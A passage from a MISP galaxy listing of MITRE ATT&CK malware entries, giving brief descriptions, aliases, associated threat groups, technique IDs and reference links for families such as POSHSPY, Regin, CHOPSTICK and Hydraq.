https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

POSHSPY - S0150

[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)

The tag is: misp-galaxy:mitre-malware="POSHSPY - S0150"

POSHSPY - S0150 is also known as:

  • POSHSPY

POSHSPY - S0150 has relationships with:

  • similar: misp-galaxy:malpedia="POSHSPY" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 7267. Table References

Links

https://attack.mitre.org/software/S0150

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

Ixeshe - S0015

[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)

The tag is: misp-galaxy:mitre-malware="Ixeshe - S0015"

Ixeshe - S0015 is also known as:

  • Ixeshe

Ixeshe - S0015 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 7268. Table References

Links

https://attack.mitre.org/software/S0015

https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html

PipeMon - S0501

[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)

The tag is: misp-galaxy:mitre-malware="PipeMon - S0501"

PipeMon - S0501 is also known as:

  • PipeMon

Table 7269. Table References

Links

https://attack.mitre.org/software/S0501

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

HDoor - S0061

[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="HDoor - S0061"

HDoor - S0061 is also known as:

  • HDoor

  • Custom HDoor

HDoor - S0061 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 7270. Table References

Links

https://attack.mitre.org/software/S0061

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Hildegard - S0601

[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)

The tag is: misp-galaxy:mitre-malware="Hildegard - S0601"

Hildegard - S0601 is also known as:

  • Hildegard

Table 7271. Table References

Links

https://attack.mitre.org/software/S0601

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Mafalda - S1060

[Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)

The tag is: misp-galaxy:mitre-malware="Mafalda - S1060"

Mafalda - S1060 is also known as:

  • Mafalda

Table 7272. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

https://attack.mitre.org/software/S1060

SideTwist - S0610

[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)

The tag is: misp-galaxy:mitre-malware="SideTwist - S0610"

SideTwist - S0610 is also known as:

  • SideTwist

Table 7273. Table References

Links

https://attack.mitre.org/software/S0610

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

BISCUIT - S0017

[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="BISCUIT - S0017"

BISCUIT - S0017 is also known as:

  • BISCUIT

BISCUIT - S0017 has relationships with:

  • similar: misp-galaxy:tool="BISCUIT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 7274. Table References

Links

https://attack.mitre.org/software/S0017

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Helminth - S0170

[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)

The tag is: misp-galaxy:mitre-malware="Helminth - S0170"

Helminth - S0170 is also known as:

  • Helminth

Helminth - S0170 has relationships with:

  • similar: misp-galaxy:malpedia="Helminth" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7275. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://attack.mitre.org/software/S0170

hcdLoader - S0071

[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)

The tag is: misp-galaxy:mitre-malware="hcdLoader - S0071"

hcdLoader - S0071 is also known as:

  • hcdLoader

hcdLoader - S0071 has relationships with:

  • similar: misp-galaxy:rat="hcdLoader" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7276. Table References

Links

http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

https://attack.mitre.org/software/S0071

Elise - S0081

[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)

The tag is: misp-galaxy:mitre-malware="Elise - S0081"

Elise - S0081 is also known as:

  • Elise

  • BKDR_ESILE

  • Page

Elise - S0081 has relationships with:

  • similar: misp-galaxy:malpedia="Elise" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Elise Backdoor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7277. Table References

Links

https://attack.mitre.org/software/S0081

https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html

Fakecalls - S1080

[Fakecalls](https://attack.mitre.org/software/S1080) is an Android trojan, first detected in January 2021, that masquerades as South Korean banking apps. It has capabilities to intercept calls to banking institutions and even maintain realistic dialogues with the victim using pre-recorded audio snippets.(Citation: kaspersky_fakecalls_0422)

The tag is: misp-galaxy:mitre-malware="Fakecalls - S1080"

Fakecalls - S1080 is also known as:

  • Fakecalls

Table 7278. Table References

Links

https://attack.mitre.org/software/S1080

https://www.kaspersky.com/blog/fakecalls-banking-trojan/44072/

Sykipot - S0018

[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)

The tag is: misp-galaxy:mitre-malware="Sykipot - S0018"

Sykipot - S0018 is also known as:

  • Sykipot

Sykipot - S0018 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7279. Table References

Links

http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments

https://attack.mitre.org/software/S0018

https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards

Volgmer - S0180

[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)

The tag is: misp-galaxy:mitre-malware="Volgmer - S0180"

Volgmer - S0180 is also known as:

  • Volgmer

Volgmer - S0180 has relationships with:

  • similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7280. Table References

Links

https://attack.mitre.org/software/S0180

https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2

https://www.us-cert.gov/ncas/alerts/TA17-318B

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF

NightClub - S1090

[NightClub](https://attack.mitre.org/software/S1090) is a modular implant written in C++ that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2014.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-malware="NightClub - S1090"

NightClub - S1090 is also known as:

  • NightClub

Table 7281. Table References

Links

https://attack.mitre.org/software/S1090

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Epic - S0091

[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)

The tag is: misp-galaxy:mitre-malware="Epic - S0091"

Epic - S0091 is also known as:

  • Epic

  • Tavdig

  • Wipbot

  • WorldCupSec

  • TadjMakhal

Epic - S0091 has relationships with:

  • similar: misp-galaxy:tool="Wipbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7282. Table References

Links

https://attack.mitre.org/software/S0091

https://securelist.com/the-epic-turla-operation/65545/

Regin - S0019

[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)

The tag is: misp-galaxy:mitre-malware="Regin - S0019"

Regin - S0019 is also known as:

  • Regin

Regin - S0019 has relationships with:

  • similar: misp-galaxy:tool="Regin" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Regin" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7283. Table References

Links

https://attack.mitre.org/software/S0019

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

Chaos - S0220

[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)

The tag is: misp-galaxy:mitre-malware="Chaos - S0220"

Chaos - S0220 is also known as:

  • Chaos

Chaos - S0220 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 7284. Table References

Links

http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/

https://attack.mitre.org/software/S0220

Uroburos - S0022

[Uroburos](https://attack.mitre.org/software/S0022) is a sophisticated cyber espionage tool written in C that has been used by units within Russia’s Federal Security Service (FSB) associated with the [Turla](https://attack.mitre.org/groups/G0010) toolset to collect intelligence on sensitive targets worldwide. [Uroburos](https://attack.mitre.org/software/S0022) has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. [Uroburos](https://attack.mitre.org/software/S0022) is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. [Uroburos](https://attack.mitre.org/software/S0022) has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)(Citation: Kaspersky Turla)

The tag is: misp-galaxy:mitre-malware="Uroburos - S0022"

Uroburos - S0022 is also known as:

  • Uroburos

  • Snake

Uroburos - S0022 has relationships with:

  • similar: misp-galaxy:tool="Turla" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Uroburos (Windows)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 7285. Table References

Links

https://attack.mitre.org/software/S0022

https://securelist.com/the-epic-turla-operation/65545/

https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf

adbupd - S0202

[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="adbupd - S0202"

adbupd - S0202 is also known as:

  • adbupd

adbupd - S0202 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 7286. Table References

Links

https://attack.mitre.org/software/S0202

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

CHOPSTICK - S0023

[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).

The tag is: misp-galaxy:mitre-malware="CHOPSTICK - S0023"

CHOPSTICK - S0023 is also known as:

  • CHOPSTICK

  • Backdoor.SofacyX

  • SPLM

  • Xagent

  • X-Agent

  • webhp

CHOPSTICK - S0023 has relationships with:

  • similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 7287. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/software/S0023

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www.justice.gov/file/1080281/download

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

DroidJack - S0320

[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)

The tag is: misp-galaxy:mitre-malware="DroidJack - S0320"

DroidJack - S0320 is also known as:

  • DroidJack

DroidJack - S0320 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1429" with estimative-language:likelihood-probability="almost-certain"

Table 7288. Table References

Links

https://attack.mitre.org/software/S0320

https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app

https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat

Hydraq - S0203

[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015)

The tag is: misp-galaxy:mitre-malware="Hydraq - S0203"

Hydraq - S0203 is also known as:

  • Hydraq

  • Roarur

  • MdmBot

  • HomeUnix

  • Homux

  • HidraQ

  • HydraQ

  • McRat

  • Aurora

  • 9002 RAT

Hydraq - S0203 has relationships with:

  • similar: misp-galaxy:malpedia="Aurora" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Aurora" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="9002 RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7289. Table References

Links

https://attack.mitre.org/software/S0203

https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ

https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf

https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html

https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html

https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures

https://www.symantec.com/connect/blogs/trojanhydraq-incident

ZeroT - S0230

[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)

The tag is: misp-galaxy:mitre-malware="ZeroT - S0230"

ZeroT - S0230 is also known as:

  • ZeroT

ZeroT - S0230 has relationships with:

  • similar: misp-galaxy:malpedia="ZeroT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="ZeroT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7290. Table References

Links

https://attack.mitre.org/software/S0230

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

Twitoor - S0302

[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)

The tag is: misp-galaxy:mitre-malware="Twitoor - S0302"

Twitoor - S0302 is also known as:

  • Twitoor

Twitoor - S0302 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7291. Table References

Links

http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/

https://attack.mitre.org/software/S0302

Get2 - S0460

[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)

The tag is: misp-galaxy:mitre-malware="Get2 - S0460"

Get2 - S0460 is also known as:

  • Get2

Table 7292. Table References

Links

https://attack.mitre.org/software/S0460

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

LOWBALL - S0042

[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-malware="LOWBALL - S0042"

LOWBALL - S0042 is also known as:

  • LOWBALL

LOWBALL - S0042 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7293. Table References

Links

https://attack.mitre.org/software/S0042

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

ROKRAT - S0240

[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021)

The tag is: misp-galaxy:mitre-malware="ROKRAT - S0240"

ROKRAT - S0240 is also known as:

  • ROKRAT

Table 7294. Table References

Links

https://attack.mitre.org/software/S0240

https://blog.talosintelligence.com/2017/04/introducing-rokrat.html

https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/

Briba - S0204

[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)

The tag is: misp-galaxy:mitre-malware="Briba - S0204"

Briba - S0204 is also known as:

  • Briba

Briba - S0204 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7295. Table References

Links

https://attack.mitre.org/software/S0204

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99

Dvmap - S0420

[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)

The tag is: misp-galaxy:mitre-malware="Dvmap - S0420"

Dvmap - S0420 is also known as:

  • Dvmap

Table 7296. Table References

Links

https://attack.mitre.org/software/S0420

https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/

Dyre - S0024

[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)

The tag is: misp-galaxy:mitre-malware="Dyre - S0024"

Dyre - S0024 is also known as:

  • Dyre

  • Dyzap

  • Dyreza

Dyre - S0024 has relationships with:

  • similar: misp-galaxy:banker="Dyre" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 7297. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf

https://attack.mitre.org/software/S0024

https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/

CALENDAR - S0025

[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="CALENDAR - S0025"

CALENDAR - S0025 is also known as:

  • CALENDAR

CALENDAR - S0025 has relationships with:

  • similar: misp-galaxy:tool="CALENDAR" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7298. Table References

Links

https://attack.mitre.org/software/S0025

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

BLINDINGCAN - S0520

[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)

The tag is: misp-galaxy:mitre-malware="BLINDINGCAN - S0520"

BLINDINGCAN - S0520 is also known as:

  • BLINDINGCAN

Table 7299. Table References

Links

https://attack.mitre.org/software/S0520

https://digital.nhs.uk/cyber-alerts/2020/cc-3603

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

OnionDuke - S0052

[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="OnionDuke - S0052"

OnionDuke - S0052 is also known as:

  • OnionDuke

OnionDuke - S0052 has relationships with:

  • similar: misp-galaxy:malpedia="OnionDuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7300. Table References

Links

https://attack.mitre.org/software/S0052

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Drovorub - S0502

[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)

The tag is: misp-galaxy:mitre-malware="Drovorub - S0502"

Drovorub - S0502 is also known as:

  • Drovorub

Table 7301. Table References

Links

https://attack.mitre.org/software/S0502

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

Naid - S0205

[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)

The tag is: misp-galaxy:mitre-malware="Naid - S0205"

Naid - S0205 is also known as:

  • Naid

Naid - S0205 has relationships with:

  • similar: misp-galaxy:tool="Trojan.Naid" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 7302. Table References

Links

https://attack.mitre.org/software/S0205

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99

GLOOXMAIL - S0026

[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="GLOOXMAIL - S0026"

GLOOXMAIL - S0026 is also known as:

  • GLOOXMAIL

  • Trojan.GTALK

GLOOXMAIL - S0026 has relationships with:

  • similar: misp-galaxy:tool="GLOOXMAIL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7303. Table References

Links

https://attack.mitre.org/software/S0026

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Circles - S0602

[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company’s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)

The tag is: misp-galaxy:mitre-malware="Circles - S0602"

Circles - S0602 is also known as:

  • Circles

Table 7304. Table References

Links

https://attack.mitre.org/software/S0602

https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/

DustySky - S0062

